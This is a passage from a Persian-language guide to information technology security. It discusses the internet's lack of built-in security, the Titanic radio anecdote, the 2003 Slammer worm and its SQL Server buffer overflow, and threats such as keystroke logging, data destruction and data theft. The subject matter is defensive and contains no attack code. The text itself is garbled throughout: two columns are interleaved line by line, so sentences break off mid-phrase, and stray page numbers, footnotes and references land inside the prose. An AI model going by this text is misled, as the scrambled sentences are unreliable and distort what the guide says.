ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺳﺮﻳﻊ ﺍﺗﻔﺎﻕ ﻧﻤﻲﺍﻓﺘﻨﺪ؛ ﺑﻠﻜﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﻓﻮﺍﻳﺪ ﺁﻧﺮﺍ ﺑـﺮﺍﻱ ﺗﻤـﺎﻣﻲ
ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩﺍﻧﺪ ﻭ ﺑﺮﺍﻱ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻥ ﺯﻣـﺎﻥ ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﻣﻲ ﻧﻤﺎﻳﺎﻧﺪ .ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺎ ﻫـﺪﻑ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ
ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ،ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺛﻤﺮﺍﺕ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣـﺸﺘﺮﻙ
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﻣﻴـﺰﺍﻥ ﺁﺯﺍﺩﻱ ﻋﻤـﻞ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ
42 Username
43 Password ﺍﻓﺮﺍﺩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻭ
ﻛﺎﭘﻴﺘﺎﻥ ﻛﺸﺘﻲ ﻣﻌﺮﻭﻑ ﺗﺎﻳﺘﺎﻧﻴـﻚ ﺍﺯ ﺭﺍﺩﻳـﻮﻱ ﺍﻭﻟﻴـﻪ ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ۴۴
ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ .ﻣﺎ ﺍﺑﺘـﺪﺍ ﺑﺎﻳـﺪ ﻣﺎﻫﻴـﺖ
ﺗﻤﺎﺱ ﺍﺯ ﻛﺸﺘﻲ ﺑﺎ ﺳﺎﺣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ .ﻣﻨﺸﻲ ﺭﺍﺩﻳﻮ ﻛﻪ ﺍﻭﻟﻴﻦ ﺳﻔﺮ
ﺩﺭﻳﺎﻳﻲ ﺧﻮﺩ ﺭﺍ ﺗﺠﺮﺑـﻪ ﻣـﻲﻛـﺮﺩ ﺁﻧﻘـﺪﺭ ﭘﻴﺎﻣﻬـﺎﻱ ﺷﺨـﺼﻲ ﺩﺭﻳﺎﻓـﺖ ﺍﻳﻦ ﻧﻮﻉ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ
ﻣﻲﻧﻤﻮﺩ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ -ﻫﺸﺪﺍﺭ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻛﻮﻩ ﻳﺨـﻲ ﺑـﺰﺭﮒ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻣﻦ ﻛﻨﻴﻢ.
ﺩﺭ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ﻛﺸﺘﻲ -ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻭ ﺷﺎﻳـﺴﺘﺔ ﭘﻴﮕﻴـﺮﻱ
ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﺪ .ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺸﺘﻲ ﺑﺎ ﻛﻮﻩ ﻳﺨﻲ ﺑﺮﺧﻮﺭﺩ ﻛـﺮﺩ ﻭ
ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻌﺪ ﻏﺮﻕ ﺷﺪ.
٣٧ ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩﺍﻱ ﭼﻮﻥ ﻟﻐﻮ ﭘﺮﻭﺍﺯﻫﺎﻱ ﻫﻮﺍﻳﻲ ،ﺍﺧﺘﻼﻝ ﺩﺭ ﺯﻳﺎﺩﻱ ﻣﻲﺑﺮﻧﺪ .ﺩﺭﺳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠـﺐ ﮔﺮﻓﺘـﻪ ﻣـﻲﺷـﻮﺩ ﺁﻥ
ﺍﻧﺘﺨﺎﺑﺎﺕ ،ﻭ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻝ ﺩﺭ ﻛﺎﺭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﺍﺳﺖ ﻛﻪ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩ ﺑﺎﻳﺪ ﺍﺯ ﺍﺳﺘﻴﻼﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ
ﺑﺨﺶ ﺍﻭﻝ
٥٠
ﺷﺪ. ﺗﺸﺨﻴﺺ ﻧﻘﺾ ﺣﺮﻳﻢ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻴﻦ ﻭﻗﻮﻉ ﺟﺮﻡ ﻳﺎ ﭘﺲ ﺍﺯ ﺁﻥ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ.
ﺩﻭﻡ :ﻻﺯﻡ ﻧﻴﺴﺖ ﺷﻤﺎ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺣـﻀﻮﺭ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺭﺍ ﺧﺪﺷـﻪﺩﺍﺭ ﻛﻨﻴـﺪ. ﺑﻪ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺮ ﺩﺭﺑﺎﺭﺓ ﻛﺮﻡ Slammerﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺳـﺎﻝ
ﻼ ﻳﻚ ﻧﻔﺮ ﺩﺭ ﺍﺭﻭﭘﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﺜ ﹰ ۲۰۰۳ﻣﻴﻼﺩﻱ ﺑﺎﻋﺚ ﺧﺮﺍﺑﻲ ﺷﺪﻳﺪ ﺩﺭ ﻛﺎﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺷـﺪ ﺗﻮﺟـﻪ
ﻲ ﻛـﺴﻲ ﻛـﻪ ﺩﺭ ﻫﻨـﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﻫﺪﻑ ﺩﺭ ﻫﻨﺪ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧ ﹺ ﻛﻨﻴﺪ .ﺩﺭ ﺍﺛﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺮﻡ ،ﻛﺸﻮﺭﻫﺎﻱ ﺯﻳـﺎﺩﻱ ﺍﺯ ﺗﻤـﺎﻣﻲ
ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻋـﺮﺽ ﻳـﻚ ﺧﻴﺎﺑـﺎﻥ ﺑـﺎ ﺁﻥ ﻫـﺪﻑ ﻓﺎﺻـﻠﻪ ﺩﺍﺭﺩ ﭘﻨﺞ ﻗﺎﺭﺓ ﺟﻬﺎﻥ ﺁﻟﻮﺩﻩ ﺷـﺪﻧﺪ ﻭ ﺑﺨـﺶ ﻋﻤـﺪﺓ ﺧﺮﺍﺑﻴﻬـﺎ ﻧـﺼﻴﺐ
ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ .ﺗﻬﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻫـﺮ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺪ:
ﺟﺎﻱ ﺷﺒﻜﻪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺑﻪ ﺳﻤﺖ ﻫﺪﻓﻲ ﻣﻌﻠـﻮﻡ ﻭ ﻣـﺸﺨﺺ
) Slammerﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ Sapphireﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ(
ﺟﻬﺖﮔﻴﺮﻱ ﻛﻨـﺪ؛ ﻭ ﻫـﺪﻑ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ
ﺳــﺮﻳﻌﺘﺮﻳﻦ ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﻃــﻮﻝ ﺣﻴــﺎﺕ
ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﺧﻄﺮﻧﺎﻙ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﻛـﻪ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻨﺘﺸﺮ ﺷﺪﻩ .ﺑﺎ ﺷـﺮﻭﻉ ﮔـﺴﺘﺮﺵ ﺁﻥ ﺩﺭ ﺳﺮﺍﺳـﺮ
ﻣﺎ ﻧﺤﻮﺓ ﺗﻔﻜﺮ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫـﻴﻢ .ﻣـﻲﺗـﻮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ،ﺑﻴﺶ ﺍﺯ %۹۰ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ٤٥ﺁﺳﻴﺐﭘﺬﻳﺮ ﺩﺭ ﻋﺮﺽ
ﮔﻔﺖ ﺍﻳﻦ ﻫﻴﭻ ﺍﺭﺯﺷـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻳـﻴﻦﻧﺎﻣـﺔ ﺣـﻖ ﺗﻜﺜﻴـﺮ ۱۰ﺩﻗﻴﻘﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻧﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻧﺠﺎﻡ
Digital Millenniumﻃﺮﺍﺣـﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗﻔـﻞﺷـﻜﻦ ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﻣــﺎﻟﻲ ﻭ ﺍﻣــﻮﺭ ﺣﻤـﻞ ﻭ ﻧﻘــﻞ ﻣﺆﺳــﺴﺎﺕ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻤﻴﺘﻪﻫﺎﻱ ﻣﻠﻲ ﻭ ﺩﻭﻟﺘﻲ ﺷﺪ ﻭ ﺟـﺎﻳﻲ ﺑـﺮﺍﻱ ﻋﻜـﺲﺍﻟﻌﻤـﻞ ﺍﻧـﺴﺎﻧﻲ ﺑـﺎﻗﻲ
ﺟﻬﺎﻧﻲ ﺣﻖ ﺗﻜﺜﻴﺮ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﻭ ﺳـﺎﻳﺮ ﻣـﻮﺍﺭﺩ ﻣـﺮﺗﺒﻂ ﺑـﻪ ﻧﮕﺬﺍﺷﺖ...
ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ،ﻫﻨﻮﺯ ﻣﺸﻐﻮﻝ ﺗـﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ
٥١
ﻫﺴﺘﻨﺪ. Slammerﻗﺒــﻞ ﺍﺯ ﺳــﺎﻋﺖ ٤٦UTC ۵:۳۰ﺭﻭﺯ ﺷــﻨﺒﻪ
۲۵ﮊﺍﻧﻮﻳــﻪ ۲۰۰۳ﻣــﻴﻼﺩﻱ ﺑــﺎ ﺑﻬــﺮﻩﺑــﺮﺩﺍﺭﻱ ﺍﺯ ﻳــﻚ
ﺳﻮﻡ :ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺤﻴﻄـﻲ ﻗﺪﺭﺗﻤﻨـﺪ ﺍﻣـﺎ ﭘﻴﭽﻴـﺪﻩ ﺭﺍ ﺑﻮﺟـﻮﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺳﺮﺭﻳﺰﻱ ﺑـﺎﻓﺮ ٤٧ﺑـﺎ ﻧﻔـﻮﺫ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ
ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮ ﻋﻬﺪﺓ ﭼﻨﺪ ﺑﺎﺯﻳﮕﺮ ﺍﺳﺖ. ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ Microsoft SQL
ﻼ ﺍﮔﺮ ﺷـﻤﺎ ﻳﻜـﻲ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﻳـﻚ ISPﺑﺎﺷـﻴﺪ ،ﺭﺍﻫﻬـﺎﻱ ﻣﺜ ﹰ Serverﻳﺎ Microsoft SQL Desktop Engine
ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺷﺨـﺼﻲﺗـﺎﻥ ﭘـﻴﺶِﺭﻭ ) 2000 (MSDEﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻧﻔﻮﺫ ﻛﺮﺩ ﻭ ﺑﻪ ﺁﺭﺍﻣﻲ
ﺩﺍﺭﻳﺪ؛ ﻫﺮﭼﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ISPﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ
ﺍﻗﺪﺍﻡ ﺑﻪ ﺁﻟﻮﺩﻩ ﺳﺎﺧﺘﻦ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣﻴﺰﺑـﺎﻥ ﻧﻤـﻮﺩ.
ﺧﻮﺩ ﻳﺎ ﻧﺤﻮﺓ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ
ﺩﻳﻮﻳﺪ ﻟﻴﭽﻔﻴﻠﺪ ٤٨ﺩﺭ ﺟﻮﻻﻱ ﺳـﺎﻝ ۲۰۰۲ﻣـﻴﻼﺩﻱ ﺍﻳـﻦ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛ ﺣﺘﻲ
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﻛﺸﻒ ﻛﺮﺩ ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻧﻴـﺰ ﻗﺒـﻞ ﺍﺯ
ﺍﮔﺮ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺰﺩﻳﻚ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻧﻬﺎ ﺑﺎﺷﻴﺪ .ﭘﺲ ﺑﺎﻳﺪ ﻳـﻚ ﺍﻧﺘــﺸﺎﺭ ﻛــﺮﻡ Slammerﻭﺻــﻠﻪﺍﻱ ﺑــﺮﺍﻱ ﺍﺻــﻼﺡ ﺁﻥ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻔﺎﻇﺘﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﺘـﺎﻥ ﺍﺗﺨـﺎﺫ ﻛﻨﻴـﺪ ،ﭼﺮﺍﻛـﻪ ٤٩
ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﺑﻮﺩ.
ﻃﺒﻖ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﻛﺮﻡ ﻣﺬﻛﻮﺭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺣﺪﺍﻗﻞ ۷۵ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﺭﺍ ﺁﻟﻮﺩﻩ ﻛﺮﺩ
50 Moore, Paxson, Savage, Shannon, Staniford -ﻛﻪ ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺳﺖ -
and Weaver,"Inside the Slammer Worm,"IEEE
Security and Privacy,Vol.1,No.4,July/August ﻭ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺷﺪﻳﺪ ﺩﺭ ﻛـﺎﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺑـﺮﻭﺯ ﻧﺘـﺎﻳﺞ
2003, pp.33-39.
ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻧﻈﺮﺍﺕ ﺟﺪﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺳﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﺮﺍﺟـﻊ ٥١
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
U.S. Copyright Office Digital Millennium 45 Hosts
Copyright Act Study: 46 Universal Time Coordinated
http://www.copyright.gov/reports/studies/dmca 47 Buffer Overflow Vulnerability
/dmca_study.html 48 David Litchfield
DMCA: 49 http://www.microsoft.com/security/
http://www.copyright.gov/legislation/hr2281.pdf slammer.asp
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٨
ﺛﺒﺖ ﻛﻠﻴﺪﻫﺎ -ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻨﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﻣﻲﺩﺍﻧﻴﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺘﻮﺍﻧﻴـﺪ
ﺷﻤﺎ ﻧﺼﺐ ﺷﻮﻧﺪ ﻛﻪ ﻓﺸﺮﺩﻩﺷﺪﻥ ﺩﻛﻤﻪﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﺗﻤﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺧﻨﺜﻲ ﻧﻤﺎﻳﻴﺪ.
ﺗﻮﺳﻂ ﺷﻤﺎ ﺭﺍ ﺛﺒﺖ ﻛـﺮﺩﻩ ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻳﮕـﺮ ﻣﺨــﺎﻃﺮﺍﺕ ﻣﺤﺘﻤــﻞ ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﭼﻴــﺴﺘﻨﺪ؟ ﺍﮔــﺮ ﻫــﻴﭻ
ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ
٥٢
ﻣﻼﺣﻈﺔ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺑﻌﻀﻲ ﻧﺘﺎﻳﺠﻲ ﻛـﻪ
ﺧﺎﺭﺟﻲ ﻧﻈﻴﺮ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻣﺤﺎﻓﻈﺖﺷﺪﻩ ،ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻧﻘــﻞ ﻭ ﺍﻧﺘﻘــﺎﻻﺕ ﻣــﺎﻟﻲ ،ﻭ ﻳــﺎ ﺩﺭﻳﺎﻓــﺖ ﺗﺨﺮﻳﺐ ﺍﻃﻼﻋﺎﺕ -ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ
ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﭼـﺎﺭ ﺍﺷـﻜﺎﻝ ﻛﻨـﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟـﺖ ﻻ ﺍﻣﻜـﺎﻥﺷﻤﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺣـﺬﻑ ﺷـﻮﻧﺪ .ﺍﻟﺒﺘـﻪ ﻣﻌﻤـﻮ ﹰ
ﺳﺎﺭﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،٥٣ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﻻ
ﺑﺎﺯﻳﺎﺑﻲ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻥﺑـﺮ ﻭ ﺍﺣﺘﻤـﺎ ﹰ
ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺩﺭ ﺁﻳﻨﺪﻩ ﻧﺎﻗﺺ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﮔﺮ ﻳﻚ ﻣﺆﺳﺴﺔ ﺩﻭﻟﺘﻲ ﺑﺎﺷﻴﺪ ﻣﻤﻜـﻦ
ﺑﺮﺍﻱ ﻣﻨﺎﻓﻊ ﺷﺨﺼﻲ ﺧﻮﺩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ. ﺍﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺘﺎﻥ ﺣﻴﻦ ﺍﻳﻦ ﺩﻭﺭﻩ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﺷﻮﺩ.
ﻣﻨﻊ ﺩﺳﺘﺮﺳﻲ - ٥٤ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻘـﺾ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ -ﻣﻤﻜـﻦ
ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﻣﺤﺮﻭﻡ ﺷـﻮﻳﺪ ،ﺣﺘـﻲ ﺍﮔـﺮ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﺍﺳﺖ ﺍﺯ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﻼﻓﺎﺻﻠﻪ ﻳـﺎ ﺑـﺎ ﺗـﺄﺧﻴﺮ ﻣﻄﻠـﻊ
ﻼ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ ﭘﺎﻙ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ .ﻣﺜ ﹰ ﺷﻮﻳﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﭼـﻪ ﻛـﺴﻲ
ﻗﺎﻟﺒﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩﺍﻱ ﻇﺎﻫﺮ ﺷـﻮﻧﺪ ﻭ ﺗﻨﻬـﺎ ﻣﻬـﺎﺟﻢ ﺩﺍﺩﻩﻫﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﮔﺮﻓﺘـﻪ ،ﭼـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ
ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ. ﺍﺧﺘﻴﺎﺭ ﺍﻭﺳﺖ ،ﻳﺎ ﺑﺎ ﺁﻧﻬﺎ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺍﻧﺠـﺎﻡ ﺧﻮﺍﻫـﺪ ﺩﺍﺩ
ﻼ ﻣﺠﺰﺍﺳﺖ .ﺍﮔﺮ ﺣﺠﻢ ﻭﺳﻴﻌﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﻛﺎﻣ ﹰ
ﻫﺰﻳﻨﺔ ﺗﺮﻣﻴﻢ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﻫـﺮ ﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺣﻤـﻼﺕ ﻗﺎﺑـﻞ ﺷﻤﺎ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓﺘـﻪ ﺑﺎﺷـﺪ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ ﺳـﺎﺭﻕ
